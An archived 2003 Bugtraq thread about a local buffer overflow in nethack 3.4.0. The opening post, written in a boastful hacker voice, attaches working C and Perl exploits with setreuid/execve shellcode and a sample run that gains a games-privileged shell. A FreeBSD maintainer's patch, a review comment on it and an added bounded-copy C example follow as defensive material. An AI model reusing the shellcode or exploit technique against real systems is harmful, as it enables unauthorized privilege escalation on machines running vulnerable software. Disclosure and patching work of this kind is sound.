90137 2003-02-10 16:50 /155 lines/ <tsao_4sh0@hushmail.com>
Imported: 2003-02-10 16:50 by Brevbäraren
External recipient: phc@hushmail.com
External recipient: bugtraq@securityfocus.net
External recipient: submit@packetstormsecurity.org
Recipient: Bugtraq (import) <3451>
Subject: #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----

###################################################

/usr/games/lib/nethackdir/nethack - LOCALLY EXPLOITABLE BUFFER

try th1s: nethack -s `perl -e "print 'A' x 1000"`

The nethack RPM package for Red Hat 8 is installed SETUID GAMES!@)~*
There are pre-compiled b1nz for Amiga, Atari, Linux, Mac, MS-DOS, OS/2 and
Windows. br0, u can even dl the source and own it on *BSD, System V, Solaris,
HP-UX, BeOS and VMS! How tight is th1s w4r3z, y0?

thatz right, we can snatch games privs.. these are highly sought-after privz..
with th1s we can do stuff like.. writing our own highscore files & such.. use
it to impress your friends.. u will be the ULTIMATE NETHACKER!

ch3ck th1s:

[tsao@c:\ tmp]$ ./n 224 400
shellcode at 159->220
Using bffff6d8
Cannot find any current entries for )���۳ F�^FF V 1Û��/bin/sh�
Call is: nethack -s [-v] [-role] [maxrank] [playernames]
sh-2.05b$ id
uid=12(games) gid=500(tsao) groups=500(tsao)

to all the people who think this is lame: ANY PRIVILEGE ESCALATION IS BAD
BUSINESS!

greets: #!IC@EFNET / d4yj4y (lub yew bro.. thnx for help with the C code)
greets: The-Rev - that regedit question was da b0mb. bizz0mb.
dis: #phrack@EFNET / the_ut -- I told you guys I was skilled & could code.

Attached are a C and a Perl exploit, in case you do not have a C compiler.
I cover all the bases for u. stay tuned for ftpd/apache warez, im pumping out
more 0day than the_ut pumpz out lame questionz to test my skillz..

p.s.
[tsao@c:\ tmp]# ssh -l tsao4sh0 phrack.ru -p 31337
[root@phc /]# WHOZ THE UNIX TERRORIST NOW ?

p.p.s. im gonna drop 7350 warez soon, year of the leak bitchez.
p.p.p.s. squashing bugz is fun!

attached: nethacker.c / nethacker.pl

<cut-me-here!!!!!!!! nethacker.c cut-me-here!!!!!!!>
/*
 * tsao@efnet #!IC@efnet 2k3
 * thnx to aleph1 for execve shellcode & davidicke for setreuid() shellcode
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* setreuid(12,12) followed by execve("/bin/sh"); i386 Linux, 61 bytes */
char code[] =
    "\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* current stack pointer (i386 only); base for the return address guess */
unsigned long sp(void)
{
    unsigned long r;
    __asm__("movl %%esp,%0" : "=r"(r));
    return r;
}

int main(int argc, char **argv)
{
    char *p;
    int i, off, size;

    if (argc < 3) {
        fprintf(stderr, "usage: %s <bufsize> <offset>\n", argv[0]);
        return 1;
    }
    size = atoi(argv[1]);              /* 224 puts the return address at p[220] */
    if (size < 224) {
        fprintf(stderr, "bufsize must be at least 224\n");
        return 1;
    }
    p = malloc(size + 1);              /* +1 so the argument is NUL-terminated */
    memset(p, 0x90, size);             /* NOP sled */
    p[size] = '\0';
    off = 220 - strlen(code);          /* shellcode ends right before the return address */
    printf("shellcode at %d->%d\n", off, off + (int)strlen(code));
    for (i = 0; i < (int)strlen(code); i++)   /* copy only the shellcode, not bufsize bytes */
        p[i + off] = code[i];
    *(long *)&p[220] = sp() - atoi(argv[2]);  /* return address = esp - offset, into the sled */
    printf("Using %lx\n", sp() - atoi(argv[2]));
    execl("/usr/games/lib/nethackdir/nethack", "nethack", "-s", p, (char *)NULL);
    perror("wtf");
    return 1;
}
<eof-nethacker.c!!!!!!! eof-nethacker.c!!!!!!>

<cut-me-here nethacker.pl !!!!!! cut-me-here nethacker.pl!!!!>
#!/usr/bin/perl -w
#
# tsao@efnet #!IC@efnet 2k3
# thnx to aleph1 for execve shellcode
# davidicke for setreuid() shellcode
use strict;

# setreuid() + execve("/bin/sh") shellcode
my $sc = "";
$sc .= "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\x31\xdb";
$sc .= "\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e";
$sc .= "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12";
$sc .= "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62";
$sc .= "\x69\x6e\x2f\x73\x68\x01";

# NOP sled so that sled + shellcode + 4-byte return address is 224 bytes
my $buf = "";
for (my $i = 0; $i < (224 - length($sc) - 4); $i++) {
    $buf .= "\x90";
}
$buf .= $sc;
$buf .= "\xd2\xf8\xff\xbf";    # 0xbffff8d2 little-endian, points into the sled

# list form of exec: the buffer reaches nethack as one argv element, no shell in between
exec("/usr/games/lib/nethackdir/nethack", "-s", $buf) or die "exec failed: $!";
<eof-nethacker.pl!!!!! eof-nethacker.pl!!!!>

tsao@efnet #!IC@efnet 2k3
tsao - owning ^ x.25 like none other..
fuq u jj

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wl4EARECAB4FAj5GANIXHHRzYW9fNHNoMEBodXNobWFpbC5jb20ACgkQj944mCS4M3Xk
SgCgv5FJ4mn7EhQmO3kIKjiNHn8Ze9kAn2Bt46OsJepEYFlAlSe/ttoZiFpD
=GlgW
-----END PGP SIGNATURE-----
(90137) / <tsao_4sh0@hushmail.com>/-------(Rewrapped)

90237 2003-02-11 17:09 /48 lines/ Peter Pentchev <roam@ringlet.net>
Imported: 2003-02-11 17:09 by Brevbäraren
External recipient: tsao_4sh0@hushmail.com
Recipient: Bugtraq (import) <3468>
Comment on text 90137 by <tsao_4sh0@hushmail.com>
Subject: Re: #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow
------------------------------------------------------------
On Sat, Feb 08, 2003 at 11:18:49PM -0800, tsao_4sh0@hushmail.com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> ###################################################
>
> /usr/games/lib/nethackdir/nethack - LOCALLY EXPLOITABLE BUFFER
>
> try th1s: nethack -s `perl -e "print 'A' x 1000"`

Here is a bandaid that I just committed to the FreeBSD Ports Collection and
also submitted to the NetHack developers. I say 'bandaid', because there might
be a lot of other strcat() weirdnesses in the NetHack source :(

The patch is also available at
http://people.FreeBSD.org/~roam/devel/nethack/topten.c.patch

G'luck,
Peter

--
Peter Pentchev    roam@ringlet.net    roam@FreeBSD.org
PGP key:          http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint   FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
I've heard that this sentence is a rumor.

--- src/topten.c	Thu Mar 21 01:43:19 2002
+++ src/topten.c	Tue Feb 11 15:36:23 2003
@@ -855,8 +855,15 @@
 	if (playerct < 1) Strcat(pbuf, "you.");
 	else {
 	    if (playerct > 1) Strcat(pbuf, "any of ");
-	    for (i = 0; i < playerct; i++) {
-		Strcat(pbuf, players[i]);
+	    for (i = 0; i < playerct && strlen(pbuf) < sizeof(pbuf) - 2;
+		 i++) {
+		size_t len = strlen(pbuf), rest;
+		if (strlen(players[i]) > sizeof(pbuf) - len - 2) {
+		    rest = sizeof(pbuf) - strlen(pbuf) - 2;
+		    memcpy(pbuf + len, players[i], rest);
+		    pbuf[len + rest] = '\0';
+		} else
+		    Strcat(pbuf, players[i]);
 		if (i < playerct-1) {
 		    if (players[i][0] == '-' && index("pr", players[i][1])
 			&& players[i][2] == 0)
(90237) /Peter Pentchev <roam@ringlet.net>/---------
Attachment (application/pgp-signature) in text 90238

90238 2003-02-11 17:09 /8 lines/ Peter Pentchev <roam@ringlet.net>
Imported: 2003-02-11 17:09 by Brevbäraren
External recipient: tsao_4sh0@hushmail.com
Recipient: Bugtraq (import) <3469>
Attachment (text/plain) to text 90237
Subject: Attachment to: Re: #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+SQPc7Ri2jRYZRVMRAk1FAJ9pSXvbQhwarvS12JrL381v096JJwCeP83B
aBGDAkBKf7UsQOI8KpTvTlA=
=XZso
-----END PGP SIGNATURE-----
(90238) /Peter Pentchev <roam@ringlet.net>/---------
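Review bot: after the truncating branch the loop body still falls through into the `if (i < playerct-1)` separator logic, and the terminator has just been written at `sizeof(pbuf) - 2`, so only one byte of headroom is left for whatever that branch appends with Strcat; the bound `strlen(pbuf) < sizeof(pbuf) - 2` is only re-checked at the top of the next iteration. Put a `break;` right after `pbuf[len + rest] = '\0';` (nothing more can fit anyway), or bound the separator appends the same way. Minor: `rest = sizeof(pbuf) - strlen(pbuf) - 2;` recomputes a length already held in `len`; `rest = sizeof(pbuf) - len - 2;` reads more clearly and visibly matches the condition just tested.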
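The overflow in the advisory above (player names from argv appended to a fixed-size pbuf with unbounded Strcat) and the bounded-copy approach of Peter Pentchev's patch, shown together as an added example. This is not code from either message and not NetHack's own topten.c: the buffer size PBUF_SIZE, the function names, and the separator logic (", ", " or ", ".") are assumptions chosen for the example, and the real code's special handling of "-p"/"-r" arguments is left out. Every append is bounded and the builder stops at the first truncation, so the separator appended after a truncated name cannot run past the end either. The 1000-byte name in poc_stays_in_bounds() is the advisory's proof of concept, constructed inline.

```c
/* Added example: bounded construction of the "Cannot find any current
 * entries for ..." message. Names and sizes here are assumptions, not
 * NetHack's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PBUF_SIZE 80    /* assumed buffer size, small enough to show truncation */

/* Append src to the NUL-terminated string in dst[dstsz]. Copies as much as
 * fits, always leaves dst terminated. Returns 0 if all of src fit, -1 if it
 * had to be truncated. */
static int append_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(dst);
    size_t room = dstsz - len - 1;          /* bytes free before the terminator */
    size_t n = strlen(src);
    if (n <= room) {
        memcpy(dst + len, src, n + 1);      /* includes the NUL */
        return 0;
    }
    memcpy(dst + len, src, room);
    dst[len + room] = '\0';
    return -1;
}

/* Build the message the way the vulnerable code does, but every Strcat is
 * replaced by append_bounded and the loop stops at the first truncation,
 * so the separator after a truncated name has no chance to overflow.
 * Returns 0 if the full message fit, -1 if it was cut short. */
int build_missing_entries_msg(char *pbuf, size_t sz,
                              const char **players, int playerct)
{
    int i;
    if (sz == 0)
        return -1;
    pbuf[0] = '\0';
    if (append_bounded(pbuf, sz, "Cannot find any current entries for ") < 0)
        return -1;
    if (playerct < 1)
        return append_bounded(pbuf, sz, "you.");
    if (playerct > 1 && append_bounded(pbuf, sz, "any of ") < 0)
        return -1;
    for (i = 0; i < playerct; i++) {
        const char *sep;
        if (append_bounded(pbuf, sz, players[i]) < 0)
            return -1;
        /* assumed separator scheme: "a, b or c." */
        sep = (i == playerct - 1) ? "." : (i == playerct - 2) ? " or " : ", ";
        if (append_bounded(pbuf, sz, sep) < 0)
            return -1;
    }
    return 0;
}

/* Feed the advisory's proof of concept (one 1000-byte name, constructed
 * here) to the bounded builder with a canary byte just past the buffer.
 * Returns 1 if the buffer stayed in bounds and terminated, 0 otherwise. */
int poc_stays_in_bounds(void)
{
    char *name = malloc(1001);
    char *mem = malloc(PBUF_SIZE + 1);
    const char *players[1];
    int rc, ok;

    memset(name, 'A', 1000);
    name[1000] = '\0';
    players[0] = name;
    mem[PBUF_SIZE] = (char)0xA5;            /* canary right after pbuf */

    rc = build_missing_entries_msg(mem, PBUF_SIZE, players, 1);
    ok = (rc == -1)
      && ((unsigned char)mem[PBUF_SIZE] == 0xA5)   /* canary untouched */
      && (strlen(mem) == PBUF_SIZE - 1);           /* terminated inside the buffer */

    free(name);
    free(mem);
    return ok;
}

int main(void)
{
    char pbuf[PBUF_SIZE];
    const char *names[] = { "arthur", "wizard", "tsao" };

    build_missing_entries_msg(pbuf, sizeof pbuf, names, 3);
    puts(pbuf);
    printf("PoC contained: %s\n", poc_stays_in_bounds() ? "yes" : "no");
    return 0;
}
```

The truncation branch in the patch corresponds to the memcpy path in append_bounded; the difference is that the builder above returns as soon as any piece is cut, which is the early exit the patch's loop condition only provides on the next iteration.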